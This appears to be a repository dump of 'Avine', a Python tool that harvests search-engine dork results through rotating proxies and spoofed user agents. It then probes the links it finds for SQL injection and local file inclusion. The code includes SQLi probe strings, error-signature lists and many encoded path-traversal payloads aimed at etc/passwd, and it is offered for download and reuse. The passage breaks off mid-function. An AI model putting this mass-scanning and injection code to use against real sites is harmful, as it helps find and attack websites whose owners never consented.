├── README.md ├── avine.py ├── pictures ├── engines.png ├── login.png ├── modules.png ├── parser.png └── sqliscan.png ├── requirements.txt └── results └── results here.txt /README.md: -------------------------------------------------------------------------------- 1 | # Avine 2 | Avine is an unfinished sql/dorking tool I made in python. A lot of things I never finished because I'm making a csharp version. If anyone is interesting in contributing to avine message me on discord: KillinMachine#2570. There will not be any updates as of now. The vulnerability Does not work. Some engines of the dork parser do work. I just wanted to release this for people to use if they really need something and to learn how it works. Excuse my messy code and some questionable ways I did things. 3 | 4 | ### Download exe [Here](https://github.com/MachineKillin/Avine/releases/download/v1.0.1/avine.zip) 5 | 6 | ## About 7 | Avine is a python Dork Parser with a proxy scraper and sql/lfi scanner. Scanners do not work but can be fixed. This program was going to be sold thats why theres a login screen. I did not want to sell the python version due to it being slow. **Please do give credit if you use my code anywhere!** 8 | 9 | ## Help 10 | For help join my discord server [Avine Discord](https://discord.gg/bFUKufJp6X) or [Github Discord](https://discord.com/invite/JcAvQc797r) 11 | 12 | ## Installing 13 | ``` 14 | git clone https://github.com/MachineKillin/Avine 15 | cd avine 16 | pip install -r requirements.txt 17 | python3 avine.py 18 | ``` 19 | 20 | ## Pictures 21 | ![](pictures/parser.png) 22 | ![](pictures/sqliscan.png) 23 | ![](pictures/engines.png) 24 | ![](pictures/modules.png) 25 | ![](pictures/login.png) 26 | -------------------------------------------------------------------------------- /avine.py: -------------------------------------------------------------------------------- 1 | from itertools import count 2 | from operator import truediv 3 | import os, time, ctypes, urllib3, requests, datetime, tkinter, threading, random, urllib.parse, re, subprocess, hmac, subprocess, hashlib, json, sys 4 | from weakref import proxy 5 | from colorama import init, Fore 6 | from tkinter import filedialog 7 | from bs4 import BeautifulSoup 8 | root = tkinter.Tk() 9 | root.withdraw() 10 | dorklist = [] 11 | e = datetime.datetime.now() 12 | current_date = e.strftime("%Y-%m-%d-%H-%M-%S") 13 | filetypes = ( ('Text Files', '*.txt'), ('All Files', '.')) 14 | hardwareid = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip() 15 | badlinks = [ 16 | 'https://bing', 17 | 'https://wikipedia', 18 | 'https://stackoverflow', 19 | 'https://amazon', 20 | 'https://google', 21 | 'https://microsoft', 22 | 'https://youtube', 23 | 'https://reddit', 24 | 'https://quora', 25 | 'https://telegram', 26 | 'https://msdn', 27 | 'https://facebook', 28 | 'https://apple', 29 | 'https://twitter', 30 | 'https://instagram', 31 | 'https://cracked', 32 | 'https://nulled', 33 | 'https://yahoo', 34 | 'https://gbhackers', 35 | 'https://github', 36 | 'https://www.google', 37 | 'https://docs.microsoft', 38 | 'https://sourceforge', 39 | 'https://sourceforge.net', 40 | 'https://stackoverflow.com', 41 | 'https://www.facebook', 42 | 'https://www.bing', 43 | 'https://www.bing.com', 44 | 'https://www.bing.com/ck/a?!&&p=', 45 | 'https://bing', 46 | 'https://wikipedia', 47 | 'https://stackoverflow', 48 | 'https://amazon', 49 | 'https://google', 50 | 'https://microsoft', 51 | 'https://youtube', 52 | 'https://reddit', 53 | 'https://quora', 54 | 'https://telegram', 55 | 'https://msdn', 56 | 'https://facebook', 57 | 'https://apple', 58 | 'https://twitter', 59 | 'https://instagram', 60 | 'https://cracked', 61 | 'https://nulled', 62 | 'https://yahoo', 63 | 'https://gbhackers', 64 | 'https://github', 65 | 'https://www.google', 66 | 'https://docs.microsoft', 67 | 'https://sourceforge', 68 | 'https://sourceforge.net', 69 | 'https://stackoverflow.com', 70 | 'https://www.facebook', 71 | 'https://www.bing', 72 | 'https://www.bing.com', 73 | 'https://www.bing.com/ck/a?!&&p=', 74 | 'https://search.aol.com', 75 | 'https://search.aol', 76 | 'https://r.search.yahoo.com', 77 | 'https://r.search.yahoo', 78 | 'https://www.google.com', 79 | 'https://www.google', 80 | 'https://www.youtube.com', 81 | 'https://yabs.yandex.ru', 82 | 'https://www.ask.com', 83 | 'https://www.bing.com/search?q=', 84 | 'https://papago.naver.net', 85 | 'https://papago.naver' 86 | ] #filteres any likes with these in it 87 | headerz = [ 88 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0'}, 89 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:77.0) Gecko/20100101 Firefox/77.0'}, 90 | {'User-Agent' : 'Mozilla/5.0 (X11; Linux ppc64le; rv:75.0) Gecko/20100101 Firefox/75.0'}, 91 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/75.0'}, 92 | {'User-Agent' : 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.10; rv:75.0) Gecko/20100101 Firefox/75.0'}, 93 | {'User-Agent' : 'Mozilla/5.0 (X11; Linux; rv:74.0) Gecko/20100101 Firefox/74.0'}, 94 | {'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/73.0'}, 95 | {'User-Agent' : 'Mozilla/5.0 (X11; OpenBSD i386; rv:72.0) Gecko/20100101 Firefox/72.0'}, 96 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:71.0) Gecko/20100101 Firefox/71.0'}, 97 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:70.0) Gecko/20191022 Firefox/70.0'}, 98 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:70.0) Gecko/20190101 Firefox/70.0'}, 99 | {'User-Agent' : 'Mozilla/5.0 (Windows; U; Windows NT 9.1; en-US; rv:12.9.1.11) Gecko/20100821 Firefox/70'}, 100 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:69.2.1) Gecko/20100101 Firefox/69.2'}, 101 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; rv:68.7) Gecko/20100101 Firefox/68.7'}, 102 | {'User-Agent' : 'Mozilla/5.0 (X11; Linux i686; rv:64.0) Gecko/20100101 Firefox/64.0'}, 103 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582'}, 104 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19577'}, 105 | {'User-Agent' : 'Mozilla/5.0 (X11) AppleWebKit/62.41 (KHTML, like Gecko) Edge/17.10859 Safari/452.6'}, 106 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931'}, 107 | {'User-Agent' : 'Chrome (AppleWebKit/537.1; Chrome50.0; Windows NT 6.3) AppleWebKit/537.36 (KHTML like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'}, 108 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.9200'}, 109 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586'}, 110 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'}, 111 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'}, 112 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'}, 113 | {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'}, 114 | {'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'}, 115 | {'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'}] #wow even more headers 116 | Results = [] 117 | GoodList = [] 118 | Total_Found = 0 119 | Valid = 0 120 | antipublic = 0 121 | Duplicates = 0 122 | Total = 0 123 | Error = 0 124 | ProxyError = 0 125 | proxylist = [] 126 | urllist = [] 127 | droklist = [] 128 | dorklina = [] 129 | dorkparse = 0 130 | threadn = 0 131 | counter = 0 132 | dupe = 0 133 | MySQL = 0 134 | MsSQL = 0 135 | PostGRES = 0 136 | Oracle = 0 137 | MariaDB = 0 138 | Nonee = 0 139 | Errorr = 0 140 | sqls = 0 141 | refresh = 0 142 | linee = 0 143 | badprox = 0 144 | first = 0 145 | askcount = 0 146 | vulnerable = 0 147 | nonvulnerable = 0 148 | savepayload = "false" 149 | lfi = 0 150 | scan = 0 151 | sqli = 0 152 | invalidurl = 0 153 | # this looks stupid 154 | init() 155 | blue, red, lightred, white, green, cyan, lightblue, reset, magenta, lightmagenta, lightcyan, yellow = Fore.BLUE, Fore.RED, Fore.LIGHTRED_EX, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.LIGHTBLUE_EX, Fore.RESET, Fore.MAGENTA, Fore.LIGHTMAGENTA_EX, Fore.LIGHTCYAN_EX, Fore.YELLOW 156 | #it took me forever to make this logo 157 | logo = f''' 158 | {cyan}╭───────────────────────────────────────────────────╮ 159 | {cyan}│ {lightcyan} ▄▀▀{cyan}█▄ {lightcyan} ▄▀▀{cyan}▄ {lightcyan}▄▀▀{cyan}▄ {lightcyan}▄{cyan}▀▀█▀{lightcyan}▄ ▄▀▀{cyan}▄ {lightcyan}▀{cyan}▄ {lightcyan}▄▀▀{cyan}█▄▄▄▄ {cyan}│ 160 | {cyan}│ {lightcyan}▐ {cyan}▄▀ ▀▄ {lightcyan}█ {cyan}█ █ {lightcyan}█ {cyan}█ {lightcyan}█ █ {cyan}█ █ █{lightcyan} ▐ {cyan}█ {lightcyan}▐ {cyan}│ 161 | {cyan}│ {cyan} █▄▄▄█ {lightcyan}▐ {cyan} █ █ {lightcyan}▐ {cyan}█ {lightcyan} ▐ ▐ {cyan} █ ▀█ █▄▄▄▄▄ {cyan}│ 162 | {cyan}│ {lightcyan} ▄{cyan}▀ █ █ ▄▀ █ █ █ █ ▌ {cyan}│ 163 | {cyan}│ {lightcyan}█ ▄▀ {cyan}▀▄▀ {lightcyan}▄{cyan}▀▀▀▀▀{lightcyan}▄ ▄▀ █ ▄{cyan}▀▄▄▄▄ {cyan}│ 164 | {cyan}│ {lightcyan}▐ ▐ █ █ █ ▐ █ ▐ {cyan}│ 165 | {cyan}│ {lightcyan} ▐ ▐ ▐ ▐ {cyan}│ 166 | {cyan}╰───────────────────────────────────────────┨{magenta}AVINE{cyan}┠─╯''' 167 | 168 | def sql(link): #this works 169 | global MySQL, MsSQL, PostGRES, Oracle, MariaDB, Nonee, Errorr, sqls 170 | check = "'" 171 | try: 172 | checker = requests.post(link + check) 173 | if "MySQL" in checker.text: 174 | MySQL+=1 175 | sqls+=1 176 | elif "native client" in checker.text: 177 | MsSQL+=1 178 | sqls+=1 179 | elif "syntax error" in checker.text: 180 | PostGRES+=1 181 | sqls+=1 182 | elif "ORA" in checker.text: 183 | Oracle+=1 184 | sqls+=1 185 | elif "MariaDB" in checker.text: 186 | MariaDB+=1 187 | sqls+=1 188 | elif "You have an error in your SQL syntax;" in checker.text: 189 | sqls+=1 190 | Nonee+=1 191 | except: 192 | Errorr+=1 193 | 194 | def lfiscan(): #never finished this lmfao 195 | global lfi_win, nonvulnerable, lfi, scan, Errorr, counter, linee 196 | counter+=1 197 | scan+=1 198 | if scan < len(urllist): 199 | linee+=1 200 | with open(fileNameUrl.name, 'r+', encoding='utf-8', errors='ignore') as e: 201 | ext = e.readlines() 202 | url = ext[int(linee)].strip() 203 | ctypes.windll.kernel32.SetConsoleTitleW(f"Avine By KillinMachine#2570 | LFI Vulnerability Scanner {scan}/{len(urllist)} | Vulnerable Urls: {lfi} | Errors: {Errorr}") 204 | if counter > 30: 205 | os.system('cls') 206 | print(logo) 207 | print() 208 | print(f"{magenta} Scanning Your Urls For LFI Vulnerabilities!") 209 | print(f" {lightblue}Progress: {yellow}[{cyan}{scan}/{len(urllist)}{yellow}]{reset}") 210 | print(f" {lightblue}Vulnerable: {yellow}[{cyan}{lfi}{yellow}]{reset}") 211 | print(f" {lightblue}Errors: {yellow}[{cyan}{Errorr}{yellow}]{reset}") 212 | print(f" {lightblue}Url: {yellow}[{cyan}{url}{yellow}]{reset}") 213 | counter = 0 214 | try: 215 | lfiscanner(url) 216 | except: 217 | Errorr+=1 218 | threading.Thread(target=lfiscan, args=()).start() 219 | if scan == len(urllist): 220 | print(logo) 221 | print() 222 | print(f"{magenta} Scanning Finished!") 223 | print() 224 | print(f"{lightblue}Vulnerable Urls: {yellow}[{cyan}{lfi}{yellow}]{reset}") 225 | time.sleep(3) 226 | main2() 227 | 228 | def lfiscanner(url): #again dont work never finished working on it 229 | global lfi_win, nonvulnerable, lfi, Errorr 230 | dot_list = [] 231 | slash_list = [] 232 | lfi_win = [] 233 | pre_dot_list = ['..', '..%00', '%2e%2e', '%5C..', '.%2e', '%2e.', '%c0%6e%c0%6e', '%252e%252e', '%c0%2e%c0%2e', '%c0%5e%c0%5e', '%%32%%65%%32%%65', '%e0%90%ae%e0%90%ae', '%25c0%25ae%25c0%25ae', '%f0%80%80%ae%f0%80%80%ae', '%fc%80%80%80%80%ae%fc%80%80%80%80%ae'] 234 | pre_slash_list = ['/', '\\', '%2f', '%5c', '%252f', '%255c', '%c0%2f', '%c0%af', '%c0%5c', '%c1%9c', '%c1%af', '%c1%8s', '%bg%qf', '%u2215', '%u2216', '%uEFC8', '%%32%%66', '%%35%%63', '%25c1%259c', '%25c0%25af', '%f8%80%80%80%af', '%f0%80%80%af'] 235 | for i in range(len(pre_dot_list)): 236 | dot_list.append(pre_dot_list[i].strip()) 237 | for i in range(len(pre_slash_list)): 238 | slash_list.append(pre_slash_list[i].strip()) 239 | goal = r"etc/passwd" 240 | succeed = 0 241 | for dot in dot_list: 242 | if succeed == 1: 243 | break 244 | for slash in slash_list: 245 | if succeed == 1: 246 | break 247 | for i in range(1, 5): 248 | if succeed == 1: 249 | break 250 | if i == 1: 251 | payload = dot+slash+goal 252 | if i == 2: 253 | payload = dot+slash+dot+slash+goal 254 | if i == 3: 255 | payload = dot+slash+dot+slash+dot+slash+goal 256 | if i == 4: 257 | payload = dot+slash+dot+slash+dot+slash+dot+slash+goal 258 | if i == 5: 259 | payload = dot+slash+dot+slash+dot+slash+dot+slash+dot+slash+goal 260 | check = requests.get(url+payload) 261 | if ("root:") in check.text: 262 | succeed = 1 263 | win_payload = payload 264 | lfi+=1 265 | lfi_win.append(win_payload) 266 | with open(r'results/lfi.txt', 'a') as File: 267 | if savepayload == "true": 268 | File.write(url) + File.write(f" | {win_payload}") + File.write('\n') 269 | if savepayload == "false": 270 | File.write(url) + File.write('\n') 271 | break 272 | else: 273 | nonvulnerable+=1 274 | 275 | def vulnscan(): #broken asf i got distracted while working on this f 276 | global vulnerable, nonvulnerable, savepayload, scan, Errorr, counter, linee, invalidurl 277 | scan+=1 278 | counter+=1 279 | if scan < len(urllist): 280 | linee+=1 281 | with open(fileNameUrl.name, 'r+', encoding='utf-8', errors='ignore') as e: 282 | ext = e.readlines() 283 | url = ext[int(linee)].strip() 284 | ctypes.windll.kernel32.SetConsoleTitleW(f"Avine By KillinMachine#2570 | SQLI Vulnerability Scanner {scan}/{len(urllist)} | Vulnerable Urls: {vulnerable} | Invalid Url's: {invalidurl} | Errors: {Errorr}") 285 | if counter > 2: 286 | os.system('cls') 287 | print(logo) 288 | print() 289 | print(f"{magenta} Scanning Your Urls For SQLI Vulnerabilities!") 290 | print(f" {lightblue}Progress: {yellow}[{cyan}{scan}/{len(urllist)}{yellow}]{reset}") 291 | print(f" {lightblue}Vulnerable: {yellow}[{cyan}{vulnerable}{yellow}]{reset}") 292 | print(f" {lightblue}Errors: {yellow}[{cyan}{Errorr}{yellow}]{reset}") 293 | print(f" {lightblue}Url: {yellow}[{cyan}{url}{yellow}]{reset}") 294 | counter = 0 295 | try: 296 | sqliscanner(url) 297 | except Exception as r: 298 | Errorr+=1 299 | print(r) 300 | time.sleep(2) 301 | threading.Thread(target=vulnscan, args=()).start() 302 | if scan == len(urllist): 303 | print(logo) 304 | print() 305 | print(f"{magenta} Scanning Finished!") 306 | print() 307 | print(f"{lightblue}Vulnerable Urls: {yellow}[{cyan}{vulnerable}{yellow}]{reset}") 308 | time.sleep(3) 309 | main2() 310 | 311 | def sqliscanner(url): #never finished 312 | global vulnerable, nonvulnerable, savepayload, invalidurl, scan 313 | try: 314 | f = url.split('=')[0] 315 | r = url.split('=')[1] 316 | eq = '=' 317 | payloads = ["'", '"', "`", "/'/", "'||'asd'||'", "'or'1'='1", "+or+1=1", "'or''='", ')', "')"] 318 | error_list = ["You have an error in your SQL syntax","error in your SQL syntax","mysql_numrows()","Input String was not in a correct format","mysql_fetch","num_rows","Error Executing Database Query","Unclosed quotation mark","Error Occured While Processing Request","Server Error","Microsoft OLE DB Provider for ODBC Drivers Error","Invalid Querystring","VBScript Runtime","Syntax Error","GetArray()","FetchRows()","executeQuery","mysql_fetch_array()"] 319 | for payload in payloads: 320 | pattern = r"http\S+" 321 | query = f + eq + r + payload 322 | try: 323 | content = requests.get(url).text 324 | content_urless = re.sub(pattern, "", content) 325 | new_content = requests.get(query).text 326 | new_content_urless = re.sub(pattern, "", new_content) 327 | if content_urless != new_content_urless and str(error_list) not in new_content_urless: 328 | nonvulnerable+=1 329 | elif str(error_list) in new_content_urless: 330 | vulnerable+=1 331 | scan+=1 332 | with open(r'results/sqli.txt', 'a') as File: 333 | if savepayload == "true": 334 | File.write(url) + File.write(f" | {payload}") + File.write('\n') 335 | if savepayload == "false": 336 | File.write(url) + File.write('\n') 337 | else: 338 | nonvulnerable+=1 339 | scan+=1 340 | except: 341 | invalidurl+=1 342 | scan+=1 343 | except: 344 | invalidurl+=1 345 | scan+=1 346 | 347 | def proxy(): #proxies like are so slow unless u got good ones so yea 348 | global ProxyError, proxies 349 | if proxytype == "https": 350 | try: 351 | RandomProxy = random.choice(proxylist) 352 | proxy = RandomProxy.split(':') 353 | if len(proxy) == 2: 354 | proxies = {'https': f'https://{RandomProxy}','http': f'http://{RandomProxy}'} 355 | elif len(proxy) == 4: 356 | proxies = {'https': f'https://{proxy[2]}:{proxy[3]}@{proxy[0]}:{proxy[1]}','http': f'http://{proxy[2]}:{proxy[3]}@{proxy[0]}:{proxy[1]}'} 357 | else: 358 | proxylist.remove(RandomProxy) 359 | except: 360 | ProxyError+=1 361 | if proxytype == "socks4": 362 | try: 363 | RandomProxy = random.choice(proxylist) 364 | proxy = RandomProxy.split(':') 365 | if len(proxy) == 2: 366 | proxies = {'https': f'socks4://{RandomProxy}','http': f'socks4://{RandomProxy}'} 367 | elif len(proxy) == 4: 368 | proxies = {'https': f'socks4://{proxy[2]}:{proxy[3]}@{proxy[0]}:{proxy[1]}','http': f'socks4://{proxy[2]}:{proxy[3]}@{proxy[0]}:{proxy[1]}'} 369 | else: 370 | proxylist.remove(RandomProxy) 371 | except: 372 | ProxyError+=1 373 | if proxytype == "socks5": 374 | try: 375 | RandomProxy = random.choice(proxylist) 376 | proxy = RandomProxy.split(':') 377 | if len(proxy) == 2: 378 | proxies = {'https': f'socks5://{RandomProxy}','http': f'socks5://{RandomProxy}'} 379 | elif len(proxy) == 4: 380 | proxies = {'https': f'socks5://{proxy[2]}:{proxy[3]}@{proxy[0]}:{proxy[1]}','http': f'socks5://{proxy[2]}:{proxy[3]}@{proxy[0]}:{proxy[1]}'} 381 | else: 382 | proxylist.remove(RandomProxy) 383 | except: 384 | ProxyError+=1 385 | 386 | def parse(): #bossman part of the code 387 | global Total_Found, Valid, Duplicates, Error, dorklina, ProxyError, Total, dorkparse, threadn, counter, dupe, refresh, engine, searchengine, badprox, first, askcount 388 | if Total < dorklineint: 389 | try: 390 | ctypes.windll.kernel32.SetConsoleTitleW(f"Avine By KillinMachine#2570 | Parsed dorks = {Total} | Total Found Links = {Total_Found} | Duplicates = {Duplicates} | Valid Links = {Valid} | Retries = {ProxyError} | Error = {Error}") 391 | counter+=1 392 | dorkparse+=1 393 | refresh+=1 394 | if dorkparse == 10: 395 | if threadn < 1: 396 | askcount = 0 397 | first = 0 398 | dorkparse = 0 399 | badprox = 0 400 | Drok() 401 | Total += 1 402 | if dupe == 10: 403 | if threadn//dupe < 15: 404 | askcount = 0 405 | dupe = 0 406 | first = 0 407 | dorkparse = 0 408 | badprox = 0 409 | Drok() 410 | Total += 1 411 | if counter > 50: 412 | askcount = 0 413 | counter = 0 414 | dorkparse = 0 415 | badprox = 0 416 | first = 0 417 | Drok() 418 | Total += 1 419 | threadn = 0 420 | dorkparse = 0 421 | if counter == 4: #weird code right here but it fixed something at one point and idk if i even needed to do this idk its stupid 422 | searchengine = engine 423 | os.system('cls') 424 | ctypes.windll.kernel32.SetConsoleTitleW(f"Avine By KillinMachine#2570 | Parsed dorks = {Total} | Total Found Links = {Total_Found} | Duplicates = {Duplicates} | Valid Links = {Valid} | Retries = {ProxyError} | Error = {Error}") 425 | print(logo) 426 | print() #lmfao this the ui part 427 | print(f'''{magenta} Parsing Dorks!{reset} 428 | {lightblue}Search Engine: {yellow}[{cyan}{searchengine}{yellow}]{reset} 429 | {lightblue}File: {yellow}[{cyan}{fileNameDork.name}{yellow}]{reset} 430 | {lightblue}Dork: {yellow}[{cyan}{dorklia}{yellow}]{reset} 431 | {lightblue}Parsed Dork's: {yellow}[{cyan}{Total}{yellow}/{cyan}{dorklineint}{yellow}]{reset}''') 432 | try: 433 | print(f" {lightblue}Total Ratio: {yellow}[{cyan}1{yellow}:{cyan}{Total_Found//Total}{yellow}]{reset}") 434 | except: 435 | pass 436 | try: 437 | print(f" {lightblue}Valid Ratio: {yellow}[{cyan}1{yellow}:{cyan}{Total_Found//Valid}{yellow}]{reset}") 438 | except: 439 | pass 440 | print(f''' {lightblue}Total Link's: {yellow}[{cyan}{Total_Found}{yellow}]{reset} 441 | {lightblue}Duplicates: {yellow}[{cyan}{Duplicates}{yellow}]{reset} 442 | {lightblue}Valid Link's: {yellow}[{cyan}{Valid}{yellow}]{reset} 443 | {lightblue}Retries: {yellow}[{cyan}{ProxyError}{yellow}]{reset} 444 | {lightblue}Error's: {yellow}[{cyan}{Error}{yellow}]{reset} 445 | 446 | {magenta} SQL Links!{reset} 447 | {lightblue}MySQL: {yellow}[{cyan}{MySQL}{yellow}]{reset} 448 | {lightblue}MSSQL: {yellow}[{cyan}{MsSQL}{yellow}]{reset} 449 | {lightblue}PostGRES: {yellow}[{cyan}{PostGRES}{yellow}]{reset} 450 | {lightblue}Oracle: {yellow}[{cyan}{Oracle}{yellow}]{reset} 451 | {lightblue}MariaDB: {yellow}[{cyan}{MariaDB}{yellow}]{reset} 452 | {lightblue}None: {yellow}[{cyan}{Nonee}{yellow}]{reset} 453 | {lightblue}Error's: {yellow}[{cyan}{Errorr}{yellow}]{reset}''') 454 | refresh = 0 455 | proxy() 456 | if engine == "Bing": 457 | header = random.choice(headerz) 458 | first+=1 459 | url = f"https://www.bing.com/search?q={urllib.parse.quote(dorklia)}&first={first}" 460 | try: 461 | if proxytype != "Proxyless": 462 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 463 | else: 464 | response_2 = requests.get(url, headers=header, timeout=10) 465 | soup = BeautifulSoup(response_2.text, 'html.parser') 466 | TagList = soup.find_all('h2') 467 | for tag in TagList: 468 | Body = tag.find_all('a') 469 | for Container in Body: 470 | link = Container['href'] 471 | try: 472 | link1 = link.split("/")[2] 473 | except: 474 | pass 475 | if "www.bing.com" in link1: 476 | r = requests.get(link) 477 | link = r.url 478 | try: 479 | link1 = link.split("/")[2] #tryna get fix the redirect link that bing gives should also do this for yahoo if ya want links 480 | except: 481 | pass 482 | if "www.bing.com" in link1: 483 | r = requests.get(link) 484 | link = r.url 485 | else: 486 | pass 487 | else: 488 | pass 489 | refresh+=1 490 | Total_Found += 1 491 | threadn+=1 492 | if link not in Results: 493 | dupe+=1 494 | Duplicates = Total_Found - Valid 495 | Results.append(link) 496 | linkhost = link.split('.com')[0] 497 | if linkhost not in badlinks: 498 | dupe = 0 499 | counter = 0 500 | if "=" in link: 501 | Valid += 1 502 | badlinks.append(link) 503 | with open(r'results/bing_links.txt', 'a') as File: 504 | File.write(link) + File.write('\n') 505 | sql(link) 506 | except: 507 | ProxyError += 1 508 | dorkparse = 0 509 | if engine == "Google": #yea dont work 510 | header = random.choice(headerz) 511 | first+=1 512 | url = f"https://www.google.com/search?q={urllib.parse.quote(dorklia)}&start={first*10}" 513 | try: 514 | if proxytype != "Proxyless": 515 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 516 | else: 517 | response_2 = requests.get(url, headers=header, timeout=10) 518 | soup = BeautifulSoup(response_2.text, 'html.parser') 519 | for d in soup.find_all("div", class_="yuRUbf"): 520 | for a in d.find_all('a'): 521 | badprox = 0 522 | link = a['href'] 523 | Total_Found += 1 524 | threadn+=1 525 | if link not in Results: 526 | dupe+=1 527 | Duplicates = Total_Found - Valid 528 | Results.append(link) 529 | linkhost = link.split('.com')[0] 530 | if linkhost not in badlinks: 531 | dupe = 0 532 | counter = 0 533 | if '=' in link: 534 | Valid += 1 535 | badlinks.append(link) 536 | with open(r'results/google_links.txt', 'a') as File: 537 | File.write(link) + File.write('\n') 538 | sql(link) 539 | except: 540 | ProxyError+=1 541 | dorkparse = 0 542 | if engine == "Yahoo": 543 | header = random.choice(headerz) 544 | first+=1 545 | url = f"https://search.yahoo.com/search?p={urllib.parse.quote(dorklia)}&b={first*10}" 546 | try: 547 | if proxytype != "Proxyless": 548 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 549 | else: 550 | response_2 = requests.get(url, headers=header, timeout=10) 551 | soup = BeautifulSoup(response_2.text, 'html.parser') 552 | for d in soup.find_all('h3', class_="title"): 553 | for a in d.find_all('a'): 554 | badprox = 0 555 | link = a['href'] 556 | Total_Found += 1 557 | threadn+=1 558 | if link not in Results: 559 | dupe+=1 560 | Duplicates = Total_Found - Valid 561 | Results.append(link) 562 | linkhost = link.split('.com')[0] 563 | if linkhost not in badlinks: 564 | dupe = 0 565 | counter = 0 566 | if '=' in link: 567 | Valid += 1 568 | badlinks.append(link) 569 | with open(r'results/yahoo_links.txt', 'a') as File: 570 | File.write(link) + File.write('\n') 571 | sql(link) 572 | except: 573 | ProxyError+=1 574 | dorkparse = 0 575 | if engine == "Ask": 576 | header = random.choice(headerz) 577 | askcount+=1 578 | if askcount == 20: 579 | first+=1 580 | askcount = 0 581 | url = f"https://www.ask.com/web?q={urllib.parse.quote(dorklia)}&page={first}" 582 | try: 583 | if proxytype != "Proxyless": 584 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 585 | else: 586 | response_2 = requests.get(url, headers=header, timeout=10) 587 | soup = BeautifulSoup(response_2.text, 'html.parser') 588 | TagList = soup.find_all("div", class_="PartialSearchResults-item-title") 589 | for tag in TagList: 590 | Body = tag.find_all('a') 591 | for Container in Body: 592 | badprox = 0 593 | link = Container['href'] 594 | Total_Found += 1 595 | threadn+=1 596 | if link not in Results: 597 | dupe+=1 598 | Duplicates = Total_Found - Valid 599 | Results.append(link) 600 | linkhost = link.split('.com')[0] 601 | if linkhost not in badlinks: 602 | dupe = 0 603 | counter = 0 604 | if '=' in link: 605 | Valid += 1 606 | badlinks.append(link) 607 | with open(r'results/ask_links.txt', 'a') as File: 608 | File.write(link) + File.write('\n') 609 | sql(link) 610 | except: 611 | ProxyError+=1 612 | dorkparse = 0 613 | if engine == "Rambler": 614 | header = random.choice(headerz) 615 | first+=1 616 | url = f"https://nova.rambler.ru/search?utm_source=head&utm_campaign=self_promo&utm_medium=form&utm_content=search&query={urllib.parse.quote(dorklia)}&page={first}" 617 | try: 618 | if proxytype != "Proxyless": 619 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 620 | else: 621 | response_2 = requests.get(url, headers=header, timeout=10) 622 | soup = BeautifulSoup(response_2.text, 'html.parser') 623 | TagList = soup.find_all('h3', class_="Serp__title--3MDnI") 624 | for tag in TagList: 625 | Body = tag.find_all('a') 626 | for Container in Body: 627 | badprox = 0 628 | link = Container['href'] 629 | Total_Found += 1 630 | threadn+=1 631 | if link not in Results: 632 | dupe+=1 633 | Duplicates = Total_Found - Valid 634 | Results.append(link) 635 | linkhost = link.split('.com')[0] 636 | if linkhost not in badlinks: 637 | dupe = 0 638 | counter = 0 639 | if '=' in link: 640 | Valid += 1 641 | badlinks.append(link) 642 | with open(r'results/rambler_links.txt', 'a') as File: 643 | File.write(link) + File.write('\n') 644 | sql(link) 645 | except: 646 | ProxyError+=1 647 | dorkparse = 0 648 | if engine == "Search": 649 | header = random.choice(headerz) 650 | url = f"https://www.search.com/web?q={urllib.parse.quote(dorklia)}" 651 | try: 652 | if proxytype != "Proxyless": 653 | response_2 = requests.get(url, headers=header, proxies=proxies, timeout=10) 654 | else: 655 | response_2 = requests.get(url, headers=header, timeout=10) 656 | soup = BeautifulSoup(response_2.text, 'html.parser') 657 | TagList = soup.find_all("div", class_="web-result-title") 658 | for tag in TagList: 